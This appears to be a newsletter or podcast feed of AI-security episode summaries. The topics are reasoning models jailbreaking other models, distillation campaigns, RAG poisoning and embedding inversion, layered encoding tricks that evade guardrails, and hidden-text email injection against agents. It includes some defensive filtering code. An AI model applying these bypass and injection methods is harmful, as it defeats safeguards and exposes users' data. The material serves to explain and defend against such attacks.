Gemini deliberately launched a full strategic nuclear exchange. Across 21 games and roughly 780,000 words of chain-of-thought reasoning, tactical nukes were deployed in 95% of simulations. No model ever chose surrender. Eight de-escalation options sat on the menu, from minimal concession to complete capitulation, and all three models ignored every single one. China Already Ran This Playbook at Scale While researchers study theoretical jailbreak rates, somebody already operationalized the output side. Anthropic disclosed this week that three Chinese AI labs ran industrial-scale distillation campaigns against Claude. DeepSeek, Moonshot AI, and MiniMax created roughly 24,000 fraudulent accounts and generated over 16 million exchanges targeting Claude’s strongest capabilities: agentic reasoning, tool use, and coding. The campaigns used commercial proxy services to bypass geofencing, spread requests across thousands of API keys, and mixed distillation traffic with legitimate queries to dodge detection. MiniMax alone generated 13 million interactions. Anthropic caught MiniMax’s campaign before it shipped the resulting model, giving them a front-row seat to a distillation attack’s full lifecycle. The technique is straightforward. Set temperature to zero, ask structured questions at scale, save the responses, and use them to train your own model. Every response from the target leaks a little bit of the probability distribution underneath. Do it 16 million times and you’ve reconstructed a meaningful chunk of what makes the target valuable. OpenAI and Google have reported similar campaigns against their own models. What If the Reasoning Is the Attack Surface? Here’s the throughline. The same chain-of-thought capability that makes these models useful is what makes them dangerous. Reasoning models can plan jailbreaks because they can plan anything. They can extract capabilities from a target model because the target’s responses are the training data. 
And when we hand them strategic decisions, they reason their way into nuclear escalation because that’s what the math looks like when accommodation isn’t in the reward function. Anthropic is building classifiers and behavioral fingerprinting to catch distillation patterns. The jailbreak researchers are calling for alignment work that prevents models from being weaponized as attackers, not just defended as targets. Payne’s war games suggest that RLHF creates conditional restraint at best, not an actual prohibition. We’re watching three different research teams independently discover the same thing: the capability is the vulnerability. The Exploit Is the Feature The reasoning that makes these models worth billions is the same reasoning that tears them apart. We built systems that plan, adapt, and optimize. Then we acted surprised when they planned, adapted, and optimized against each other. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions Can reasoning models really jailbreak other AI systems without human help? Yes. Researchers at Stuttgart and ELLIS Alicante gave four reasoning models a single system prompt and no further guidance. The models planned attack strategies in their chain-of-thought, adapted when targets resisted, and achieved a 97.14% jailbreak success rate across nine target models and 70 harmful prompt categories. The study was published in Nature Communications with peer review and human validation confirming the automated scores. What is alignment regression and why does it matter? Alignment regression is the finding that as reasoning models get smarter, they also get better at breaking safety training in other models. The expectation was that more capable models would be easier to align. The opposite is happening. The same planning and persuasion abilities that make these models useful also make them effective at dismantling guardrails. 
It creates a feedback loop where capability improvements in one model directly degrade the security posture of every other model it can talk to. How are distillation attacks connected to autonomous jailbreaking? Both exploit the same root mechanism: chain-of-thought reasoning. Distillation attackers query a target model at scale to harvest its reasoning traces as training data. Autonomous jailbreak agents use their own reasoning to plan and execute multi-turn attacks against target models. In both cases, the model’s ability to reason transparently is what makes it vulnerable. The capability that justifies the price tag is also the capability that gets extracted or weaponized.

    43 min
  11. FEB 15

    RAG Poisoning Turns Your Knowledge Base Into an Attack Surface

    TL;DR: RAG pipelines treat every document in the knowledge base as trusted context. Attackers poison that context with a single injected document and the model follows the embedded instructions. Worse, the vector embeddings that store your data can be reversed back into the original text. Your RAG is plaintext. Treat it that way. This is the public feed. Upgrade to see what doesn’t make it out. What Is RAG Poisoning and Why Builders Should Care Retrieval-augmented generation gives an LLM access to external data at query time. Instead of relying on whatever the model learned during training, RAG pulls relevant documents from a knowledge base, a vector database that stores your content as numerical representations called embeddings, and injects that content into the model’s context window right before it generates a response. The architecture solves real problems. It reduces hallucinations by grounding responses in actual documents. It lets builders customize an LLM for their specific business without retraining the model. Over half of enterprise AI applications now use some form of RAG pipeline. The problem is that every document in that knowledge base gets treated as trusted context. The model processes retrieved content through the same attention mechanism as system prompts and user messages. There is no privilege separation. No trust boundary between “data the builder put there” and “data that got there some other way.” RAG poisoning exploits this by injecting malicious content into the knowledge base. When a user’s query retrieves the poisoned document, the LLM follows the embedded instructions as if the builder wrote them. OWASP added Vector and Embedding Weaknesses as a new category (LLM08:2025), and the AI Security Glossary covers the full taxonomy specifically because RAG pipelines created an attack surface that didn’t exist before. How One Poisoned Document Hijacks the Entire Pipeline The attack surface is the ingestion pipeline. 
Anywhere untrusted data enters the knowledge base is a potential injection point: third-party APIs, scraped web content, customer-uploaded documents, shared wiki pages, even a briefly edited Wikipedia article that gets indexed before moderators revert it. The same indirect injection mechanics that hit email agents apply here, just through a different door. Research from early 2026 introduced CorruptRAG, a poisoning attack that requires only a single injected document. Older attacks assumed the attacker needed to plant multiple documents per query. CorruptRAG proved that one document, crafted to be semantically relevant to a target query, achieves higher success rates than multi-document approaches. A separate study found that injecting just five malicious texts into a knowledge base containing millions of documents achieved a 90% attack success rate. The damage scales. A poisoned document doesn’t just affect one user. Every query that retrieves it gets compromised. That single injection can exfiltrate data from other documents in the knowledge base, deliver disinformation to every user who asks a related question, or brick the entire application. Anthropic’s magic string attack demonstrated exactly this: a test string planted in a RAG document triggers a deterministic refusal loop that persists until a human manually finds and removes the poisoned content. Retry logic feeds the loop. The app looks broken, and nobody knows why. Why Vector Embeddings Are Not Encryption Here’s the misconception that gets builders in trouble. RAG systems store data as vector embeddings, numerical arrays that represent the semantic meaning of text in high-dimensional space. To the human eye, these look like gibberish. Builders see that and assume the underlying data is protected. It is not. Embedding inversion attacks reconstruct the original text from its vector representation. 
A 2023 study demonstrated a Generative Embedding Inversion Attack that recovered the exact sentences that were embedded. By 2025, the technique was well documented enough that OWASP created an entire new category for it. If an attacker gains access to your vector database, or if a multi-tenant deployment lacks proper isolation, they pull the embeddings and replay them through their own model to reconstruct your data. This matters because builders are putting sensitive information into RAG knowledge bases (customer records, internal policies, pricing data, support ticket histories) without applying the same security controls they’d use on a traditional database. No encryption at rest. No access controls scoped to user roles. No audit trail on who queried what. The AI Security 101 primer covers why treating AI infrastructure like traditional infrastructure is the baseline, not the ceiling. Vector databases need the same rigor as any data store that holds sensitive information, because that’s exactly what they are. Frequently Asked Questions How does RAG poisoning differ from regular prompt injection? Regular prompt injection comes from the user’s direct input. RAG poisoning is a form of indirect prompt injection where the malicious payload lives inside documents in the knowledge base. The attacker never interacts with the model directly. They poison the environment the model reads from, and the retriever delivers the payload automatically when a user’s query matches. One poisoned document can affect every user who triggers retrieval of related content. Can attackers extract data from a RAG knowledge base? Yes. Through inference attacks, model inversion, and targeted prompt sequences, attackers can extract the contents of a RAG by querying the model until it returns the underlying documents. The vector embeddings themselves can also be reversed.
A 2023 study demonstrated reconstruction of original text from embeddings alone. OWASP added Vector and Embedding Weaknesses (LLM08:2025) specifically to address this class of vulnerability. What is the fastest way to secure a RAG pipeline? Treat the knowledge base as a sensitive data store. Apply access controls, encrypt at rest and in transit, validate every document before indexing, and never let the LLM auto-ingest content from untrusted sources without human review. For high-sensitivity operations, add human-in-the-loop approval before the model acts on retrieved context. Input and output guardrails from providers like AWS Bedrock add another layer, but they don’t replace data hygiene at the ingestion point.
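The "validate every document before indexing" advice above can be sketched as a gate in the ingestion pipeline. Everything here is an illustrative assumption: `TRUSTED_SOURCES`, `SUSPICIOUS_PATTERNS`, `Document`, and `ingestion_decision` are hypothetical names, and the three regexes are examples only. A pattern list like this will miss a semantically crafted document of the CorruptRAG kind, so treat it as one layer alongside human review, not a replacement for it.

```python
import re
from dataclasses import dataclass

# Hypothetical source labels; a real pipeline would define its own provenance tags.
TRUSTED_SOURCES = {"internal-wiki", "policy-repo"}

# Illustrative patterns only; a maintained deployment would need a far broader set.
SUSPICIOUS_PATTERNS = [
    re.compile(r"ignore (all |any )?(previous|prior|above) instructions", re.I),
    re.compile(r"\byou are now\b", re.I),
    re.compile(r"\bsystem prompt\b", re.I),
]


@dataclass
class Document:
    source: str  # where the content came from
    text: str    # raw text that would be embedded and indexed


def ingestion_decision(doc: Document) -> str:
    """Return 'index' for documents that may be auto-indexed, else 'review'."""
    # Untrusted provenance never gets auto-ingested.
    if doc.source not in TRUSTED_SOURCES:
        return "review"
    # Even trusted sources get held if the text reads like instructions to the model.
    if any(pattern.search(doc.text) for pattern in SUSPICIOUS_PATTERNS):
        return "review"
    return "index"
```

The design choice is to fail closed: anything from an unknown source, or anything that looks like it is talking to the model rather than to a reader, waits for a human.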

    1h 7m
  12. FEB 11

    LLM Guardrail Evasion Stacks Encoding to Bypass Every Filter

    TL;DR: LLMs process instructions and data through the same pipeline with zero privilege separation. Encoding-layer attacks stack languages, base64, and character substitution to sail past every filter. Indirect injection does the same thing through your email. Both exploits share one root cause, and guardrails can’t fix it. This is the public feed. Upgrade to see what doesn’t make it out. Why LLM Guardrail Evasion Works Every Time Every LLM guardrail shares the same architectural blind spot. The model processes system prompts, user messages, and attacker payloads through the same attention mechanism, the part of the neural network that decides which tokens matter most. There is no privileged channel. No access control layer between “instructions from the developer” and “text from the user.” Researchers call this instruction-data conflation. OWASP ranks it LLM01:2025, the number one vulnerability in production LLM deployments, for the second consecutive year. Defenders compensate with two layers. Input guardrails scan incoming text for known attack patterns, keywords, and regex matches. Output guardrails scan the model’s response for leaked secrets or blocked terms. Both layers are deterministic filters wrapped around a probabilistic system. The model decides what to do with context based on statistical weights, and every piece of context gets equal treatment. The attacker needs one path through n-dimensional vector space that the guardrails didn’t anticipate. The defender has to block all of them. NIST’s Apostol Vassilev put it bluntly: finite guardrails will always have adversarial prompts that break the model. How Encoding Attacks Stack Layers to Beat AI Safety Filters The attack works like an onion. Each encoding layer peels away one defensive control. Layer one: language switching. LLM safety training skews heavily toward English. Guardrail classifiers are trained primarily on English-language attack patterns. 
The same request refused in English sails through when phrased in French, Irish, or Zulu. The model still understands the intent perfectly. The classifier misses it because semantic relationships embed differently across languages, and safety alignment data is thinner outside English. This is the same class of guardrail bypass that keeps evolving faster than defenses can patch. Layer two: output encoding. Even if the language switch gets the model to process a restricted query, output filters scan the response for blocked terms. Asking the model to respond in base64 turns plain-text answers into encoded strings that no regex catches. The attacker decodes client-side. Layer three: character substitution. Leetspeak, homoglyphs (visually identical Unicode characters from different alphabets), or diacritics add another layer of obfuscation. Mindgard’s research tested character injection techniques against commercial guardrails including Azure Prompt Shield and Meta’s Prompt Guard. Some techniques, like emoji smuggling, achieved 100% evasion across every system tested. Stack all three and the model understands the query perfectly while every guardrail sees noise. How Indirect Prompt Injection Turns Email Into an Attack Vector Direct injection requires the attacker to type into the model’s input. Indirect injection skips that entirely. The attacker poisons data the model consumes during normal operation, and the same instruction-data conflation does the rest. OpenClaw, the open-source AI agent that hit 123,000 GitHub stars in 48 hours, connects to Gmail, Slack, Discord, and the local filesystem. When someone sends an OpenClaw user a normal-looking email with hidden instructions in tiny white text at the bottom, the agent reads the full message, including the invisible payload. One documented attack embedded instructions that convinced the agent the text was a system-level directive from the owner. The agent deleted all emails, including the trash folder. 
Another researcher extracted a private SSH key via a single poisoned email in five minutes. The root cause is identical: the email body is data, the hidden text is an instruction, and the model has no mechanism to tell them apart. CrowdStrike documented indirect prompt injection attempts on Moltbook, the AI-agent-only social network where OpenClaw instances interact, including one designed to drain crypto wallets. The attacker never touched OpenClaw directly. The poison was in the environment. For a deeper look at the foundational concepts behind these attacks, the AI Security 101 primer covers the full landscape. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is instruction-data conflation in large language models? Instruction-data conflation means the model processes developer system prompts, user messages, and external content through the same attention pipeline with no privilege separation. An attacker’s payload gets the same treatment as a legitimate instruction. OWASP ranks this LLM01:2025, the top vulnerability in production LLM applications, because no post-training fix can create a hard boundary between trusted and untrusted input. Can base64 encoding really bypass AI guardrails? Yes. Models learn to decode base64 during pre-training on internet data, but safety training rarely covers encoded inputs. This creates a blind spot where the model processes restricted queries without triggering any filter. Mindgard’s research showed some character-level evasion techniques hit 100% success rates against production guardrails including Azure Prompt Shield. Multi-layer encoding stacking languages on top of output encoding compounds the problem. How does indirect prompt injection work through email? An attacker embeds hidden instructions in an email body, typically as tiny white text the human recipient never sees. 
When an AI agent processes that email, the model reads the hidden text as part of its input context and may follow the embedded instructions. Documented OpenClaw attacks have exfiltrated SSH keys, deleted entire mailboxes, and attempted cryptocurrency theft without direct access to the AI agent.
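Part of the encoding-stack problem described above is that filters inspect the raw string while the model sees through the obfuscation. One partial mitigation is to canonicalize text before any guardrail looks at it. The sketch below is a minimal illustration with hypothetical function names (`strip_invisible`, `decoded_base64_spans`, `views_for_filtering`). It assumes NFKC normalization and dropping Unicode format characters are acceptable for the application, and it does not address cross-script homoglyphs or the language-switching layer.

```python
import base64
import binascii
import re
import unicodedata

# Runs of 16+ base64-alphabet characters, optionally padded, are treated as candidates.
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def strip_invisible(text: str) -> str:
    """NFKC-normalize, then drop Unicode format characters (category Cf) such as zero-width spaces."""
    normalized = unicodedata.normalize("NFKC", text)
    return "".join(ch for ch in normalized if unicodedata.category(ch) != "Cf")


def decoded_base64_spans(text: str) -> list:
    """Decode base64-looking tokens that turn out to be printable UTF-8 text."""
    decoded = []
    for token in BASE64_TOKEN.findall(text):
        try:
            candidate = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not text
        if candidate.isprintable():
            decoded.append(candidate)
    return decoded


def views_for_filtering(text: str) -> list:
    """Return every view of the input a guardrail should scan: cleaned text plus decoded payloads."""
    cleaned = strip_invisible(text)
    return [cleaned, *decoded_base64_spans(cleaned)]
```

A guardrail would then run its checks over each string returned by `views_for_filtering` rather than over the raw input. This narrows the gap for the simplest encodings; it does not fix the underlying instruction-data conflation.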

    58 min
